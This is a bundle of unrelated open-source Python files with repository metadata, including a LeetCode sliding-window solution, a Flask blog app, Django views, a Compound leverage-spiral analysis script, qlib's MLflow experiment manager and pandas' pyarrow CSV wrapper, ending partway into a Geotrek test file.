f20235c0e3846362a86443bc24339b337f43af04
|
[
"MIT"
] | null | null | null |
amazon-practice/python/arrays-and-strings/2-longest-substring-without-repeating-characters.py
|
souradeepta/leetcode-practice
|
f20235c0e3846362a86443bc24339b337f43af04
|
[
"MIT"
] | null | null | null |
amazon-practice/python/arrays-and-strings/2-longest-substring-without-repeating-characters.py
|
souradeepta/leetcode-practice
|
f20235c0e3846362a86443bc24339b337f43af04
|
[
"MIT"
] | null | null | null |
# Longest Substring Without Repeating Characters
# Brute force:: Time: O(n^3), Space: O(min(n,n)) We need O(k) space for checking a substring
# has no duplicate characters, where k is the size of the Set. The size of the Set is upper bounded
# by the size of the string n and the size of the charset/alphabet m
#
# Sliding Window Optimzied:: Time:O(n), Space: O(min(n,m))
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
# check for empty input
if len(s) == 0:
return 0
start = -1
result = 0
usedChar = {}
for i in range(len(s)):
# if character is found in our map, move the start to that character
if s[i] in usedChar and start <= usedChar[s[i]]:
start = max(start, usedChar[s[i]])
else:
# if not then we then we just calculate the new possible result
result = max(result, i - start)
# add our new character and its index
usedChar[s[i]] = i
return result
| 41.346154
| 100
| 0.581395
|
cc8fbcf68fb9959441ac06742cf94d811cf0be4d
| 1,422
|
py
|
Python
|
app.py
|
Shrawant13/myblog
|
8fc2536aab4c836d5a2ff6bb32e59cb2ac9a3b2a
|
[
"MIT"
] | null | null | null |
app.py
|
Shrawant13/myblog
|
8fc2536aab4c836d5a2ff6bb32e59cb2ac9a3b2a
|
[
"MIT"
] | null | null | null |
app.py
|
Shrawant13/myblog
|
8fc2536aab4c836d5a2ff6bb32e59cb2ac9a3b2a
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template, request, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI']='sqlite:///blog.db'
db =SQLAlchemy(app)
class Blogpost(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(50))
subtitle = db.Column(db.String(50))
author = db.Column(db.String(50))
date_posted = db.Column(db.DateTime)
content = db.Column(db.Text)
@app.route('/')
def index():
posts = Blogpost.query.order_by(Blogpost.date_posted.desc()).all()
return render_template('index.html', posts=posts)
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/post/<int:post_id>')
def post(post_id):
post = Blogpost.query.filter_by(id=post_id).one()
return render_template('post.html', post=post)
@app.route('/add')
def add():
return render_template('add.html')
@app.route('/addpost', methods=['POST'])
def addpost():
title = request.form['title']
subtitle = request.form['subtitle']
author = request.form['author']
content = request.form['content']
post = Blogpost(title=title, subtitle=subtitle, author=author, content=content, datetime=datetime.now())
db.session.add(post)
db.session.commit()
return redirect(url_for('index'))
if __name__ == '__main__':
app.run(debug=True)
| 25.392857
| 106
| 0.696906
|
7f50439a3d99c21171c97a01553f0577ec8136f2
| 449
|
py
|
Python
|
tests/test_multiple_docs.py
|
miselin/templatizer
|
e838b6246c4bbf22b39cbf6f635b1c92cc9da113
|
[
"MIT"
] | null | null | null |
tests/test_multiple_docs.py
|
miselin/templatizer
|
e838b6246c4bbf22b39cbf6f635b1c92cc9da113
|
[
"MIT"
] | 2
|
2022-03-30T04:00:10.000Z
|
2022-03-30T04:30:08.000Z
|
tests/test_multiple_docs.py
|
miselin/templatizer
|
e838b6246c4bbf22b39cbf6f635b1c92cc9da113
|
[
"MIT"
] | null | null | null |
"""Tests for combining multiple documents."""
import unittest
from utils import Simple
import templatizer
# pylint: disable=C0116,R0201
class TestMultipleDocumentGeneration(unittest.TestCase):
"""Unit tests for non-imperative templating."""
def test_simple_property(self):
contents = templatizer.run([Simple(), Simple()])
self.assertEqual(contents, "12345\n---\n12345")
if __name__ == "__main__":
unittest.main()
| 21.380952
| 56
| 0.714922
|
c3d5c7cc3170ba5d156f5550f32565c5e694f5b1
| 4,320
|
py
|
Python
|
rateapp/views.py
|
Angelamutyota/ratemysite
|
7ed3b95ec820f0b05a816a5822974278ceba2b20
|
[
"Unlicense",
"MIT"
] | null | null | null |
rateapp/views.py
|
Angelamutyota/ratemysite
|
7ed3b95ec820f0b05a816a5822974278ceba2b20
|
[
"Unlicense",
"MIT"
] | null | null | null |
rateapp/views.py
|
Angelamutyota/ratemysite
|
7ed3b95ec820f0b05a816a5822974278ceba2b20
|
[
"Unlicense",
"MIT"
] | null | null | null |
from django.http.response import Http404
from rest_framework import serializers
from rateapp.forms import ProjectForm, CreateUserForm, ProfileForm
from django.shortcuts import render, redirect
from django.http import HttpResponse
from.models import Profile, Project
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.core.exceptions import ObjectDoesNotExist
from rest_framework.views import APIView
from rest_framework.response import Response
from .serializer import ProfileSerializer, ProjectSerializer
from rateapp import serializer
# Create your views here.
def registerPage(request):
form = CreateUserForm()
if request.method == 'POST':
form = CreateUserForm(request.POST)
if form.is_valid():
form.save()
return redirect('loginpage')
name = form.cleaned_data.get("username")
messages.success(request, 'Account was created for' , name)
context = {'form':form, 'profile':profile}
return render(request, 'accounts/register.html', context)
def loginPage(request):
if request.method == 'POST':
username = request.POST.get("username")
password = request.POST.get("password")
user = authenticate(request,username=username,password=password)
if user is not None:
login(request,user)
return redirect('index')
else:
messages.info(request, 'Incorrect Username or Password')
context = {}
return render(request, 'accounts/login.html', context)
def logoutpage(request):
logout(request)
return redirect('loginpage')
@login_required(login_url='loginpage')
def index(request):
projects = Project.objects.all()
return render(request, 'index.html', {'projects': projects})
@login_required(login_url='loginpage')
def profile(request):
try:
profile = request.user.profile
except Profile.DoesNotExist:
profile = Profile(user=request.user)
user = request.user
if request.method == 'POST':
prof_form = ProfileForm(request.POST, request.FILES, instance=request.user.profile)
if prof_form.is_valid():
prof_form.save()
return redirect(request.path_info)
else:
prof_form = ProfileForm(instance=request.user.profile)
profiles = Profile.objects.filter(user=user)
projects = Project.objects.filter(user = user)
context = {
'projects': projects,
'profiles': profiles,
'prof_form': prof_form,
}
return render(request, 'profile.html', context)
@login_required(login_url='loginpage')
def search(request):
if 'projectname' in request.GET and request.GET ['projectname']:
search_title = request.GET.get('projectname')
searched_project = Project.search_project(search_title)
message = f"{search_title}"
return render(request, 'search.html', {"message": message, "projects": searched_project })
else:
message = "You haven't searched for any term"
return render(request, 'search.html',{"message":message})
@login_required(login_url='loginpage')
def new_project(request):
current_user = request.user
if request.method == 'POST':
form = ProjectForm(request.POST or None, request.FILES)
if form.is_valid():
project = form.save(commit=False)
project.user = current_user
project.save()
return redirect('index')
else:
form = ProjectForm()
return render(request,'newproject.html',{"form":form})
@login_required(login_url='loginpage')
def project(request, id):
try:
project = Project.objects.get(id =id)
except ObjectDoesNotExist:
raise Http404()
return render(request, "project.html", {"project":project})
class ProjectList(APIView):
def get(self, request, format=None):
all_projects = Project.objects.all()
serializers = ProjectSerializer(all_projects, many=True)
return Response(serializers.data)
class ProfileList(APIView):
def get (self, request, format=None):
all_profiles = Profile.objects.all()
serializers = ProfileSerializer(all_profiles, many = True)
return Response(serializers.data)
| 34.83871
| 98
| 0.688194
|
1dcb30e71630b8cb00f79c2140e351cef000b661
| 5,973
|
py
|
Python
|
scripts/store_spirals.py
|
backdfund/analyzer
|
3069008aad80a2131b2c33d6d3dabd4f22e0a946
|
[
"MIT"
] | 18
|
2021-02-17T23:04:03.000Z
|
2022-02-02T23:07:32.000Z
|
scripts/store_spirals.py
|
Guangye-C/analyzer
|
3069008aad80a2131b2c33d6d3dabd4f22e0a946
|
[
"MIT"
] | null | null | null |
scripts/store_spirals.py
|
Guangye-C/analyzer
|
3069008aad80a2131b2c33d6d3dabd4f22e0a946
|
[
"MIT"
] | 2
|
2021-09-12T03:12:44.000Z
|
2022-03-30T09:34:40.000Z
|
import argparse
import dataclasses
import json
import os
from dataclasses import dataclass
from typing import List
import pymongo
import stringcase
from backd.db import db
from backd.logger import logger
# use cETH as the default asset for which to get all spirals
DEFAULT_ASSET = "0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
MIN_BLOCK = int(
db.events.find_one(sort=[("blockNumber", pymongo.ASCENDING)])["blockNumber"]
)
MAX_BLOCK = int(
db.events.find_one(sort=[("blockNumber", pymongo.DESCENDING)])["blockNumber"]
)
parser = argparse.ArgumentParser(prog="store-leverage-spirals")
parser.add_argument(
"-m",
"--market",
required=True,
type=str,
help="path to the jsonl file with DSR rates",
)
parser.add_argument(
"-f",
"--file",
required=True,
type=str,
help="output json file to store leverage spiral results",
)
parser.add_argument(
"-min",
"--minimum",
required=False,
default=MIN_BLOCK,
type=int,
help="minimum block from which spirals should be computed",
)
parser.add_argument(
"-max",
"--maximum",
required=False,
default=MAX_BLOCK,
type=int,
help="maximum block from which spirals should be computed",
)
parser.add_argument(
"-a",
"--address",
required=False,
type=str,
help="address for which spirals should be computed",
)
@dataclass
class SpiralEvent:
address: str
event: str
log_index: int
@dataclass
class SpiralMintEvent(SpiralEvent):
mint_amount: int
@dataclass
class SpiralBorrowEvent(SpiralEvent):
borrow_market: str
borrow_amount: int
account_borrows: int
@dataclass
class Spiral:
collateral_asset: str
block_number: int
transaction_index: int
transaction_hash: str
events: List[SpiralEvent]
def store_leverage_spirals(
market: int, file: str, start_block: int = MIN_BLOCK, end_block: int = MAX_BLOCK
):
"""
Iterates over all events for a given block range and records all leverage
spirals that occur within a single transaction. The state of a spiral is
updated to contain all of the spiral events until the Transaction Index or
the Block Number changes. A spiral has to contain the 'market' asset as
collateral. Note: no repays of leverage spirals are recorded at the moment.
"""
spiral_events = []
cursor = db.events.find(
{"blockNumber": {"$gte": start_block, "$lte": end_block}}
).sort(
[
("blockNumber", pymongo.ASCENDING),
("transactionIndex", pymongo.ASCENDING),
("logIndex", pymongo.ASCENDING),
]
)
event = cursor.next()
assert event["blockNumber"] >= start_block
candidate_spiral = Spiral(
collateral_asset=market,
block_number=event["blockNumber"],
transaction_index=event["transactionIndex"],
transaction_hash=event["transactionHash"],
events=[],
)
last_block_number = event["blockNumber"]
last_tx_index = event["transactionIndex"]
for event in cursor:
if "event" not in event.keys():
candidate_spiral = Spiral(
collateral_asset=market,
block_number=event["blockNumber"],
transaction_index=event["transactionIndex"],
transaction_hash=event["transactionHash"],
events=[],
)
continue
if (event["blockNumber"] != last_block_number) or (
(event["transactionIndex"] != last_tx_index)
and (event["blockNumber"] == last_block_number)
):
# check if it is a spiral
if is_spiral(candidate_spiral):
print("Spiral: ", candidate_spiral)
spiral_events.append(dataclasses.asdict(candidate_spiral))
last_block_number = event["blockNumber"]
last_tx_index = event["transactionIndex"]
candidate_spiral = Spiral(
collateral_asset=market,
block_number=event["blockNumber"],
transaction_index=event["transactionIndex"],
transaction_hash=event["transactionHash"],
events=[],
)
if (event["event"] == "Mint") and (event["address"].lower() == market.lower()):
spiral_event = process_mint_event(event)
candidate_spiral.events.append(spiral_event)
elif event["event"] == "Borrow":
spiral_event = process_borrow_event(event)
candidate_spiral.events.append(spiral_event)
with open(file, "w") as f:
json.dump(spiral_events, f)
def process_mint_event(event: dict) -> SpiralEvent:
return SpiralMintEvent(
event=event["event"],
log_index=event["logIndex"],
address=event["returnValues"]["minter"],
mint_amount=int(event["returnValues"]["mintAmount"]) / 1e18,
)
def process_borrow_event(event: dict) -> SpiralEvent:
return SpiralBorrowEvent(
event=event["event"],
log_index=event["logIndex"],
borrow_market=event["address"].lower(),
address=event["returnValues"]["borrower"],
borrow_amount=int(event["returnValues"]["borrowAmount"]) / 1e18,
account_borrows=int(event["returnValues"]["accountBorrows"]) / 1e18,
)
def is_spiral(candidate: Spiral) -> bool:
"""
Checks whether the 'candidate' Spiral is a an actual spiral
(i.e. if it has >1 "mint" and >1 "borrow" events). If so
it returns true, else it is not a spiral and it returns
false.
"""
borrow_events = (1 for k in candidate.events if k.event == "Borrow")
if sum(borrow_events) <= 1:
return False
mint_events = (1 for k in candidate.events if k.event == "Mint")
if sum(mint_events) <= 1:
return False
return True
def main():
args = parser.parse_args()
store_leverage_spirals(args.market, args.file, args.minimum, args.maximum)
if __name__ == "__main__":
main()
| 29.136585
| 87
| 0.644065
|
1eccfcaeaacb9bad72ee70b4e3ae34fc5d96e5f8
| 1,023
|
py
|
Python
|
Processes/imscommon/imscommon/table_joiner.py
|
rangaswamymr/incubator-bluemarlin
|
6cb60b2a41edc6509377f9eacb7660d199a9485b
|
[
"Apache-2.0"
] | 4
|
2021-04-08T17:17:34.000Z
|
2022-02-25T11:52:21.000Z
|
Processes/imscommon/imscommon/table_joiner.py
|
rangaswamymr/incubator-bluemarlin
|
6cb60b2a41edc6509377f9eacb7660d199a9485b
|
[
"Apache-2.0"
] | 23
|
2021-03-09T20:37:02.000Z
|
2022-03-07T16:16:32.000Z
|
Processes/imscommon/imscommon/table_joiner.py
|
rangaswamymr/incubator-bluemarlin
|
6cb60b2a41edc6509377f9eacb7660d199a9485b
|
[
"Apache-2.0"
] | 6
|
2021-03-08T19:46:09.000Z
|
2022-01-12T17:59:29.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.html
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class TableJoiner:
def __init__(self, hive_context, query):
self.query = query
self.hive_context = hive_context
def join_tables(self):
df = self.hive_context.sql(self.query)
return df
| 40.92
| 75
| 0.73998
|
175127b2e9c4788dea80e2cfafed6fee9e523882
| 101
|
py
|
Python
|
lib/python2.7/_weakrefset.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 6
|
2017-01-22T03:15:01.000Z
|
2019-12-01T16:19:36.000Z
|
lib/python2.7/_weakrefset.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 4
|
2020-02-11T23:39:49.000Z
|
2022-01-13T00:40:48.000Z
|
lib/python2.7/_weakrefset.py
|
wfehrnstrom/harmonize
|
e5661d24b2021739e8ac4bf1d3a530eda4e155b3
|
[
"MIT"
] | 6
|
2017-01-19T21:49:55.000Z
|
2021-04-14T09:57:17.000Z
|
/usr/local/Cellar/python/2.7.13/Frameworks/Python.framework/Versions/2.7/lib/python2.7/_weakrefset.py
| 101
| 101
| 0.821782
|
56fe810c38d04fad8545d45217c679c1ca3dfe4b
| 14,966
|
py
|
Python
|
qlib/workflow/expm.py
|
Rekind1e/qlib
|
373f6e0900df73a6741c73fd89882edadcd9e968
|
[
"MIT"
] | null | null | null |
qlib/workflow/expm.py
|
Rekind1e/qlib
|
373f6e0900df73a6741c73fd89882edadcd9e968
|
[
"MIT"
] | null | null | null |
qlib/workflow/expm.py
|
Rekind1e/qlib
|
373f6e0900df73a6741c73fd89882edadcd9e968
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import mlflow
from mlflow.exceptions import MlflowException
from mlflow.entities import ViewType
import os
from pathlib import Path
from contextlib import contextmanager
from typing import Optional, Text
from .exp import MLflowExperiment, Experiment
from ..config import C
from .recorder import Recorder
from ..log import get_module_logger
logger = get_module_logger("workflow", "INFO")
class ExpManager:
"""
This is the `ExpManager` class for managing experiments. The API is designed similar to mlflow.
(The link: https://mlflow.org/docs/latest/python_api/mlflow.html)
"""
def __init__(self, uri: Text, default_exp_name: Optional[Text]):
self._current_uri = uri
self.default_exp_name = default_exp_name
self.active_experiment = None # only one experiment can active each time
def __repr__(self):
return "{name}(current_uri={curi})".format(name=self.__class__.__name__, curi=self._current_uri)
def start_exp(
self,
experiment_name: Optional[Text] = None,
recorder_name: Optional[Text] = None,
uri: Optional[Text] = None,
**kwargs,
):
"""
Start an experiment. This method includes first get_or_create an experiment, and then
set it to be active.
Parameters
----------
experiment_name : str
name of the active experiment.
recorder_name : str
name of the recorder to be started.
uri : str
the current tracking URI.
Returns
-------
An active experiment.
"""
raise NotImplementedError(f"Please implement the `start_exp` method.")
def end_exp(self, recorder_status: Text = Recorder.STATUS_S, **kwargs):
"""
End an active experiment.
Parameters
----------
experiment_name : str
name of the active experiment.
recorder_status : str
the status of the active recorder of the experiment.
"""
raise NotImplementedError(f"Please implement the `end_exp` method.")
def create_exp(self, experiment_name: Optional[Text] = None):
"""
Create an experiment.
Parameters
----------
experiment_name : str
the experiment name, which must be unique.
Returns
-------
An experiment object.
"""
raise NotImplementedError(f"Please implement the `create_exp` method.")
def search_records(self, experiment_ids=None, **kwargs):
"""
Get a pandas DataFrame of records that fit the search criteria of the experiment.
Inputs are the search critera user want to apply.
Returns
-------
A pandas.DataFrame of records, where each metric, parameter, and tag
are expanded into their own columns named metrics.*, params.*, and tags.*
respectively. For records that don't have a particular metric, parameter, or tag, their
value will be (NumPy) Nan, None, or None respectively.
"""
raise NotImplementedError(f"Please implement the `search_records` method.")
def get_exp(self, experiment_id=None, experiment_name=None, create: bool = True):
"""
Retrieve an experiment. This method includes getting an active experiment, and get_or_create a specific experiment.
The returned experiment will be active.
When user specify experiment id and name, the method will try to return the specific experiment.
When user does not provide recorder id or name, the method will try to return the current active experiment.
The `create` argument determines whether the method will automatically create a new experiment according
to user's specification if the experiment hasn't been created before.
* If `create` is True:
* If `active experiment` exists:
* no id or name specified, return the active experiment.
* if id or name is specified, return the specified experiment. If no such exp found, create a new experiment with given id or name, and the experiment is set to be active.
* If `active experiment` not exists:
* no id or name specified, create a default experiment.
* if id or name is specified, return the specified experiment. If no such exp found, create a new experiment with given id or name, and the experiment is set to be active.
* Else If `create` is False:
* If `active experiment` exists:
* no id or name specified, return the active experiment.
* if id or name is specified, return the specified experiment. If no such exp found, raise Error.
* If `active experiment` not exists:
* no id or name specified. If the default experiment exists, return it, otherwise, raise Error.
* if id or name is specified, return the specified experiment. If no such exp found, raise Error.
Parameters
----------
experiment_id : str
id of the experiment to return.
experiment_name : str
name of the experiment to return.
create : boolean
create the experiment it if hasn't been created before.
Returns
-------
An experiment object.
"""
# special case of getting experiment
if experiment_id is None and experiment_name is None:
if self.active_experiment is not None:
return self.active_experiment
# User don't want get active code now.
# Don't assume underlying code could handle the case of two None
if experiment_id is None and experiment_name is None:
experiment_name = self.default_exp_name
if create:
exp, is_new = self._get_or_create_exp(experiment_id=experiment_id, experiment_name=experiment_name)
else:
exp, is_new = self._get_exp(experiment_id=experiment_id, experiment_name=experiment_name), False
if is_new:
self.active_experiment = exp
# start the recorder
self.active_experiment.start()
return exp
def _get_or_create_exp(self, experiment_id=None, experiment_name=None) -> (object, bool):
"""
Method for getting or creating an experiment. It will try to first get a valid experiment, if exception occurs, it will
automatically create a new experiment based on the given id and name.
"""
try:
if experiment_id is None and experiment_name is None:
experiment_name = self.default_exp_name
return self._get_exp(experiment_id=experiment_id, experiment_name=experiment_name), False
except ValueError:
if experiment_name is None:
experiment_name = self.default_exp_name
logger.info(f"No valid experiment found. Create a new experiment with name {experiment_name}.")
return self.create_exp(experiment_name), True
def _get_exp(self, experiment_id=None, experiment_name=None) -> Experiment:
"""
get specific experiment by name or id. If it does not exist, raise ValueError
Parameters
----------
experiment_id :
The id of experiment
experiment_name :
The id name experiment
Returns
-------
Experiment:
The searched experiment
Raises
------
ValueError
"""
raise NotImplementedError(f"Please implement the `_get_exp` method")
def delete_exp(self, experiment_id=None, experiment_name=None):
"""
Delete an experiment.
Parameters
----------
experiment_id : str
the experiment id.
experiment_name : str
the experiment name.
"""
raise NotImplementedError(f"Please implement the `delete_exp` method.")
@property
def default_uri(self):
"""
Get the default tracking URI from qlib.config.C
"""
if "kwargs" not in C.exp_manager or "uri" not in C.exp_manager["kwargs"]:
raise ValueError("The default URI is not set in qlib.config.C")
return C.exp_manager["kwargs"]["uri"]
@property
def uri(self):
"""
Get the default tracking URI or current URI.
Returns
-------
The tracking URI string.
"""
return self._current_uri or self.default_uri
def set_uri(self, uri: Optional[Text] = None):
"""
Set the current tracking URI and the corresponding variables.
Parameters
----------
uri : str
"""
if uri is None:
logger.info("No tracking URI is provided. Use the default tracking URI.")
self._current_uri = self.default_uri
else:
# Temporarily re-set the current uri as the uri argument.
self._current_uri = uri
# Customized features for subclasses.
self._set_uri()
def _set_uri(self):
"""
Customized features for subclasses' set_uri function.
"""
raise NotImplementedError(f"Please implement the `_set_uri` method.")
def list_experiments(self):
"""
List all the existing experiments.
Returns
-------
A dictionary (name -> experiment) of experiments information that being stored.
"""
raise NotImplementedError(f"Please implement the `list_experiments` method.")
class MLflowExpManager(ExpManager):
"""
Use mlflow to implement ExpManager.
"""
def __init__(self, uri: Text, default_exp_name: Optional[Text]):
super(MLflowExpManager, self).__init__(uri, default_exp_name)
self._client = None
def _set_uri(self):
self._client = mlflow.tracking.MlflowClient(tracking_uri=self.uri)
logger.info("{:}".format(self._client))
@property
def client(self):
# Delay the creation of mlflow client in case of creating `mlruns` folder when importing qlib
if self._client is None:
self._client = mlflow.tracking.MlflowClient(tracking_uri=self.uri)
return self._client
def start_exp(
self, experiment_name: Optional[Text] = None, recorder_name: Optional[Text] = None, uri: Optional[Text] = None
):
# Set the tracking uri
self.set_uri(uri)
# Create experiment
experiment, _ = self._get_or_create_exp(experiment_name=experiment_name)
# Set up active experiment
self.active_experiment = experiment
# Start the experiment
self.active_experiment.start(recorder_name)
return self.active_experiment
def end_exp(self, recorder_status: Text = Recorder.STATUS_S):
if self.active_experiment is not None:
self.active_experiment.end(recorder_status)
self.active_experiment = None
# When an experiment end, we will release the current uri.
self._current_uri = None
def create_exp(self, experiment_name: Optional[Text] = None):
assert experiment_name is not None
# init experiment
experiment_id = self.client.create_experiment(experiment_name)
experiment = MLflowExperiment(experiment_id, experiment_name, self.uri)
experiment._default_name = self.default_exp_name
return experiment
def _get_exp(self, experiment_id=None, experiment_name=None):
"""
Method for getting or creating an experiment. It will try to first get a valid experiment, if exception occurs, it will
raise errors.
"""
assert (
experiment_id is not None or experiment_name is not None
), "Please input at least one of experiment/recorder id or name before retrieving experiment/recorder."
if experiment_id is not None:
try:
exp = self.client.get_experiment(experiment_id)
if exp.lifecycle_stage.upper() == "DELETED":
raise MlflowException("No valid experiment has been found.")
experiment = MLflowExperiment(exp.experiment_id, exp.name, self.uri)
return experiment
except MlflowException:
raise ValueError(
"No valid experiment has been found, please make sure the input experiment id is correct."
)
elif experiment_name is not None:
try:
exp = self.client.get_experiment_by_name(experiment_name)
if exp is None or exp.lifecycle_stage.upper() == "DELETED":
raise MlflowException("No valid experiment has been found.")
experiment = MLflowExperiment(exp.experiment_id, experiment_name, self.uri)
return experiment
except MlflowException as e:
raise ValueError(
"No valid experiment has been found, please make sure the input experiment name is correct."
)
def search_records(self, experiment_ids, **kwargs):
filter_string = "" if kwargs.get("filter_string") is None else kwargs.get("filter_string")
run_view_type = 1 if kwargs.get("run_view_type") is None else kwargs.get("run_view_type")
max_results = 100000 if kwargs.get("max_results") is None else kwargs.get("max_results")
order_by = kwargs.get("order_by")
return self.client.search_runs(experiment_ids, filter_string, run_view_type, max_results, order_by)
def delete_exp(self, experiment_id=None, experiment_name=None):
assert (
experiment_id is not None or experiment_name is not None
), "Please input a valid experiment id or name before deleting."
try:
if experiment_id is not None:
self.client.delete_experiment(experiment_id)
else:
experiment = self.client.get_experiment_by_name(experiment_name)
if experiment is None:
raise MlflowException("No valid experiment has been found.")
self.client.delete_experiment(experiment.experiment_id)
except MlflowException as e:
raise Exception(
f"Error: {e}. Something went wrong when deleting experiment. Please check if the name/id of the experiment is correct."
)
def list_experiments(self):
# retrieve all the existing experiments
exps = self.client.list_experiments(view_type=ViewType.ACTIVE_ONLY)
experiments = dict()
for exp in exps:
experiment = MLflowExperiment(exp.experiment_id, exp.name, self.uri)
experiments[exp.name] = experiment
return experiments
| 38.772021
| 187
| 0.634639
|
618da9d33c49096eefbf5b3384c29ac97cc58080
| 5,780
|
py
|
Python
|
crabageprediction/venv/Lib/site-packages/pandas/io/parsers/arrow_parser_wrapper.py
|
13rianlucero/CrabAgePrediction
|
92bc7fbe1040f49e820473e33cc3902a5a7177c7
|
[
"MIT"
] | 3
|
2021-11-23T05:35:28.000Z
|
2022-02-10T08:05:53.000Z
|
crabageprediction/venv/Lib/site-packages/pandas/io/parsers/arrow_parser_wrapper.py
|
13rianlucero/CrabAgePrediction
|
92bc7fbe1040f49e820473e33cc3902a5a7177c7
|
[
"MIT"
] | 5
|
2022-02-13T14:38:04.000Z
|
2022-02-15T00:13:07.000Z
|
crabageprediction/venv/Lib/site-packages/pandas/io/parsers/arrow_parser_wrapper.py
|
13rianlucero/CrabAgePrediction
|
92bc7fbe1040f49e820473e33cc3902a5a7177c7
|
[
"MIT"
] | 4
|
2022-02-04T22:58:27.000Z
|
2022-02-14T19:29:18.000Z
|
from __future__ import annotations
from pandas._typing import ReadBuffer
from pandas.compat._optional import import_optional_dependency
from pandas.core.dtypes.inference import is_integer
from pandas.core.frame import DataFrame
from pandas.io.parsers.base_parser import ParserBase
class ArrowParserWrapper(ParserBase):
"""
Wrapper for the pyarrow engine for read_csv()
"""
def __init__(self, src: ReadBuffer[bytes], **kwds):
super().__init__(kwds)
self.kwds = kwds
self.src = src
self._parse_kwds()
def _parse_kwds(self):
"""
Validates keywords before passing to pyarrow.
"""
encoding: str | None = self.kwds.get("encoding")
self.encoding = "utf-8" if encoding is None else encoding
self.usecols, self.usecols_dtype = self._validate_usecols_arg(
self.kwds["usecols"]
)
na_values = self.kwds["na_values"]
if isinstance(na_values, dict):
raise ValueError(
"The pyarrow engine doesn't support passing a dict for na_values"
)
self.na_values = list(self.kwds["na_values"])
def _get_pyarrow_options(self):
"""
Rename some arguments to pass to pyarrow
"""
mapping = {
"usecols": "include_columns",
"na_values": "null_values",
"escapechar": "escape_char",
"skip_blank_lines": "ignore_empty_lines",
}
for pandas_name, pyarrow_name in mapping.items():
if pandas_name in self.kwds and self.kwds.get(pandas_name) is not None:
self.kwds[pyarrow_name] = self.kwds.pop(pandas_name)
self.parse_options = {
option_name: option_value
for option_name, option_value in self.kwds.items()
if option_value is not None
and option_name
in ("delimiter", "quote_char", "escape_char", "ignore_empty_lines")
}
self.convert_options = {
option_name: option_value
for option_name, option_value in self.kwds.items()
if option_value is not None
and option_name
in ("include_columns", "null_values", "true_values", "false_values")
}
self.read_options = {
"autogenerate_column_names": self.header is None,
"skip_rows": self.header
if self.header is not None
else self.kwds["skiprows"],
}
def _finalize_output(self, frame: DataFrame) -> DataFrame:
"""
Processes data read in based on kwargs.
Parameters
----------
frame: DataFrame
The DataFrame to process.
Returns
-------
DataFrame
The processed DataFrame.
"""
num_cols = len(frame.columns)
multi_index_named = True
if self.header is None:
if self.names is None:
if self.prefix is not None:
self.names = [f"{self.prefix}{i}" for i in range(num_cols)]
elif self.header is None:
self.names = range(num_cols)
if len(self.names) != num_cols:
# usecols is passed through to pyarrow, we only handle index col here
# The only way self.names is not the same length as number of cols is
# if we have int index_col. We should just pad the names(they will get
# removed anyways) to expected length then.
self.names = list(range(num_cols - len(self.names))) + self.names
multi_index_named = False
frame.columns = self.names
# we only need the frame not the names
# error: Incompatible types in assignment (expression has type
# "Union[List[Union[Union[str, int, float, bool], Union[Period, Timestamp,
# Timedelta, Any]]], Index]", variable has type "Index") [assignment]
frame.columns, frame = self._do_date_conversions( # type: ignore[assignment]
frame.columns, frame
)
if self.index_col is not None:
for i, item in enumerate(self.index_col):
if is_integer(item):
self.index_col[i] = frame.columns[item]
else:
# String case
if item not in frame.columns:
raise ValueError(f"Index {item} invalid")
frame.set_index(self.index_col, drop=True, inplace=True)
# Clear names if headerless and no name given
if self.header is None and not multi_index_named:
frame.index.names = [None] * len(frame.index.names)
if self.kwds.get("dtype") is not None:
try:
frame = frame.astype(self.kwds.get("dtype"))
except TypeError as e:
# GH#44901 reraise to keep api consistent
raise ValueError(e)
return frame
def read(self) -> DataFrame:
"""
Reads the contents of a CSV file into a DataFrame and
processes it according to the kwargs passed in the
constructor.
Returns
-------
DataFrame
The DataFrame created from the CSV file.
"""
pyarrow_csv = import_optional_dependency("pyarrow.csv")
self._get_pyarrow_options()
table = pyarrow_csv.read_csv(
self.src,
read_options=pyarrow_csv.ReadOptions(**self.read_options),
parse_options=pyarrow_csv.ParseOptions(**self.parse_options),
convert_options=pyarrow_csv.ConvertOptions(**self.convert_options),
)
frame = table.to_pandas()
return self._finalize_output(frame)
| 36.582278
| 86
| 0.585121
|
522b3cfb13190630c002ab86511835edff5a93f8
| 1,551
|
py
|
Python
|
geotrek/trekking/tests/test_trek_relationship.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 50
|
2016-10-19T23:01:21.000Z
|
2022-03-28T08:28:34.000Z
|
geotrek/trekking/tests/test_trek_relationship.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 1,422
|
2016-10-27T10:39:40.000Z
|
2022-03-31T13:37:10.000Z
|
geotrek/trekking/tests/test_trek_relationship.py
|
pierreloicq/Geotrek-admin
|
00cd29f29843f2cc25e5a3c7372fcccf14956887
|
[
"BSD-2-Clause"
] | 46
|
2016-10-27T10:59:10.000Z
|
2022-03-22T15:55:56.000Z
|
from django.test import TestCase
from django.db import IntegrityError
from django.db.models import Q
from ..factories import TrekFactory, TrekRelationshipFactory
from ..models import TrekRelationship
class TrekRelationshipsTestCase(TestCase):
